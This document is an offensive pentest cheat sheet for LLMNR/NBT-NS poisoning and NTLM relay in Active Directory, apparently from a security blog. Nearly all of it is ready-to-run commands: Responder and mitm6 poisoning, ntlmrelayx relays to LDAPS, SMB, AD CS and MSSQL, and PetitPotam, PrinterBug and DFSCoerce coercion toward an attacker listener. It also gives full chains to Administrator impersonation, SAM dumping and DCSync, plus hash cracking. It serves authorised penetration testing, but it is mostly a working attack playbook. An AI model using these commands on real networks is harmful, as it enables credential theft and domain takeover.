LLMNR & NTLM Relay

Sections LLMNR & NTLM Relay

Capture NTLM hashes from broadcast poisoning, or relay them straight into LDAP/SMB/HTTP for instant compromise. Often the path from zero creds to domain admin.

DC=10.10.11.50
DOMAIN=corp.local
ATTACKER=10.10.14.1

i. Quick map of the chain

  1. Capture or coerce an NTLM auth from a victim
  2. Relay that auth to a target service (LDAP, LDAPS, SMB, HTTP cert enroll, MSSQL)
  3. Action: dump SAM, write ACL, request a cert, add RBCD, get a TGT

What’s relayable depends on:

  • SMB signing required? -> can’t relay to SMB
  • LDAP signing + channel binding enforced? -> can’t relay to LDAP/LDAPS
  • HTTPS cert enrollment open without channel binding? -> ESC8 relay
  • Coerced auth source (machine vs user) determines what you can do at the target

Check signing posture first:

nxc smb $DC                         ## shows signing in the host banner
nxc ldap $DC                        ## shows LDAP signing + channel binding
nxc smb 10.10.11.0/24 --gen-relay-list relay.txt   ## auto-builds list of SMB-signing-not-required targets

ii. Responder, LLMNR/NBT-NS/MDNS poisoning

Default install at /usr/share/responder. Disable HTTP and SMB if you’re relaying to them:

sudo responder -I eth0 -wv
## Quieter, only analyze (no poisoning):
sudo responder -I eth0 -A
## When pairing with ntlmrelayx, turn off SMB+HTTP so they don't conflict:
sudo sed -i 's/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/' /usr/share/responder/Responder.conf
sudo responder -I eth0 -wv

Output paths:

  • Captured hashes: /usr/share/responder/logs/
  • Per-user: Responder-Session.log
  • Hashes by protocol: <protocol>-NTLMv2-SSP-<IP>.txt

Crack with hashcat -m 5600 for NetNTLMv2:

hashcat -m 5600 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

iii. mitm6, IPv6 DHCPv6 takeover

Way more effective than LLMNR on modern networks because IPv6 is on by default and unconfigured. mitm6 advertises itself as the DNS server, Windows prefers IPv6, all DNS queries route to you.

## Drop attacker as DNS server for the domain:
sudo mitm6 -i eth0 -d $DOMAIN
## Then pair with ntlmrelayx, see below

Combine with WPAD spoofing for browser auth:

sudo responder -I eth0 -wv -F      ## -F forces WPAD basic auth

iv. ntlmrelayx targets and outcomes

The relay target dictates the outcome. Pick the one that gives you the biggest win.

Relay to LDAP/LDAPS, add a computer (when MachineAccountQuota > 0) and grant it RBCD on victim:

sudo impacket-ntlmrelayx -t ldaps://$DC --delegate-access --escalate-user pwnuser --no-smb-server -smb2support
## Or write a user's ACL to give yourself control:
sudo impacket-ntlmrelayx -t ldaps://$DC --escalate-user attacker

Relay to SMB to dump SAM on a target without signing:

sudo impacket-ntlmrelayx -tf relay.txt -smb2support
## With SOCKS proxy so all relayed sessions become reusable:
sudo impacket-ntlmrelayx -tf relay.txt -smb2support -socks

Relay to AD CS Web Enrollment (ESC8), get a cert for the victim:

sudo impacket-ntlmrelayx -t http://ca.corp.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
## Or with certipy directly:
sudo certipy relay -target 'http://ca.corp.local'
sudo certipy relay -target 'http://ca.corp.local' -template DomainController

Relay to MSSQL:

sudo impacket-ntlmrelayx -t mssql://10.10.11.50 -smb2support
Multi-target relay

ntlmrelayx with -tf reads a target file (one per line). When a coerced authentication hits the relay, ntlmrelayx tries all targets in parallel. Lots of free reps for SOCKS sessions.

v. Coercion methods

Hash capture is opportunistic. Coercion FORCES a target to authenticate to you. Way more reliable.

Coercer, the unified tool, tests all known methods:

## Scan to see what works on target:
coercer scan -t $DC -u $USER -p $PASS -d $DOMAIN
## Coerce against attacker listener:
coercer coerce -l $ATTACKER -t $DC -u $USER -p $PASS -d $DOMAIN
## With hash:
coercer coerce -l $ATTACKER -t $DC -u $USER -H $NTHASH -d $DOMAIN
## Filter to a single method:
coercer coerce -l $ATTACKER -t $DC -u $USER -p $PASS -d $DOMAIN --filter-method-name EfsRpcOpenFileRaw

Method-specific tools (sometimes more reliable than Coercer):

PetitPotam (MS-EFSR) - works unauth on legacy DCs, auth on patched:

impacket-petitpotam -d $DOMAIN -u $USER -p $PASS $ATTACKER $DC
## Unauth (legacy, pre-July-2022 patches):
impacket-petitpotam $ATTACKER $DC

PrinterBug (MS-RPRN) - Spooler service must be running:

impacket-printerbug "$DOMAIN/$USER:$PASS"@$DC $ATTACKER
## Check if Spooler is on:
rpcdump.py "$DOMAIN/$USER:$PASS"@$DC | grep -A2 MS-RPRN

DFSCoerce (MS-DFSNM) - DFS service, very reliable on DCs:

dfscoerce.py -u $USER -p $PASS -d $DOMAIN $ATTACKER $DC

ShadowCoerce (MS-FSRVP) - File Server VSS Agent service:

shadowcoerce.py -u $USER -p $PASS -d $DOMAIN $ATTACKER $DC

vi. The classic chains

Chain 1: mitm6 + ntlmrelayx -> create attacker-owned computer with delegation 

## Terminal 1: poison IPv6
sudo mitm6 -i eth0 -d $DOMAIN
## Terminal 2: relay LDAPS, ask for new computer + delegation
sudo impacket-ntlmrelayx -6 -t ldaps://$DC -wh fakewpad.$DOMAIN --delegate-access
## Wait for Windows hosts to renew DHCPv6 / DNS, all calls route to mitm6
## When a user (or computer) browses to anything, NTLM goes to relay
## Output: new computer object e.g. ATTACKERSYSTEM$ with password, and RBCD on the source

After this, run impacket-getST with the new computer’s credentials to impersonate Administrator:

impacket-getST -spn cifs/victim.corp.local -impersonate Administrator \
  "$DOMAIN/ATTACKERSYSTEM\$:$NEWPASS" -dc-ip $DC

See Delegation for the RBCD exploitation step.

Chain 2: PetitPotam -> relay to AD CS HTTP (ESC8)

Get DC certificate, authenticate as DC$, full DCSync:

## Terminal 1: relay to ADCS web enrollment
sudo certipy relay -target 'http://ca.corp.local' -template DomainController
## Terminal 2: coerce DC to authenticate
impacket-petitpotam -d $DOMAIN -u $USER -p $PASS $ATTACKER $DC
## certipy saves a .pfx for the DC computer account
## Authenticate with it:
certipy auth -pfx dc.pfx -dc-ip $DC
## Output: NT hash of DC$ -> DCSync, see [DCSync](https://jinpwn.dev/cheatsheets/active-directory/ad12-dcsync/)

Chain 3: Responder + ntlmrelayx for SMB lateral

Capture a user, relay to a host where SMB signing is off:

## Terminal 1: relay with auto-dump of SAM
sudo impacket-ntlmrelayx -tf relay.txt -smb2support
## Terminal 2: poison broadcasts
sudo responder -I eth0 -wv
## Wait for a privileged user to mistype a hostname
## ntlmrelayx will dump SAM on every host the user is admin on

vii. SOCKS mode for persistent sessions

-socks keeps every successful relay alive as a SOCKS endpoint:

sudo impacket-ntlmrelayx -tf relay.txt -smb2support -socks
## In ntlmrelayx prompt:
ntlmrelayx> socks
## Lists available SOCKS sessions
ntlmrelayx> targets

## On attacker, use proxychains with one of the sessions:
proxychains -q nxc smb victim.corp.local -u user -p anything   ## password ignored, uses relayed auth
proxychains -q impacket-secretsdump user:anything@victim.corp.local

viii. LDAP signing and channel binding bypass

If LDAP signing is required, raw LDAP relay fails. LDAPS works only if Channel Binding (EPA) is not enforced.

Check status:

nxc ldap $DC                                  ## prints signing + channel binding in banner
nxc ldap $DC -M ldap-checker

When both are enforced, you can’t relay to LDAP. Pivot to:

  • ESC8 (relay to HTTP/HTTPS cert enrollment)
  • SMB relay if any host has signing off (--gen-relay-list)
  • ESC11 (relay to ICPR RPC if encryption not enforced)

ix. WebDAV trick for HTTP auth

When SMB and LDAP relays fail, force the target’s WebClient to authenticate over HTTP, which is more flexible:

## Trigger WebDAV outbound from the victim:
## Use a UNC path with @ symbol that points to your attacker
## e.g. \\10.10.14.1@80\share\test
## In Coercer:
coercer coerce -l "$ATTACKER@80/x" -t $DC -u $USER -p $PASS -d $DOMAIN

Then relay the HTTP auth to LDAP (LDAP signing required, HTTP auth bypasses signing requirements via different auth source):

sudo impacket-ntlmrelayx -t ldaps://$DC --delegate-access --no-smb-server

x. NTLMv1 downgrade

Old/misconfigured systems still accept NTLMv1, which is trivially crackable via crack.sh rainbow tables. When relaying or capturing, check for NTLMv1:

sudo responder -I eth0 -wv --lm                ## force LM/NTLMv1
## If captured, crack.sh service gives the NT hash within hours

xi. After relay

Always run BloodHound after a successful relay attack. New computer objects, new RBCD edges, and any ACL writes change the graph significantly. See BloodHound for re-collection.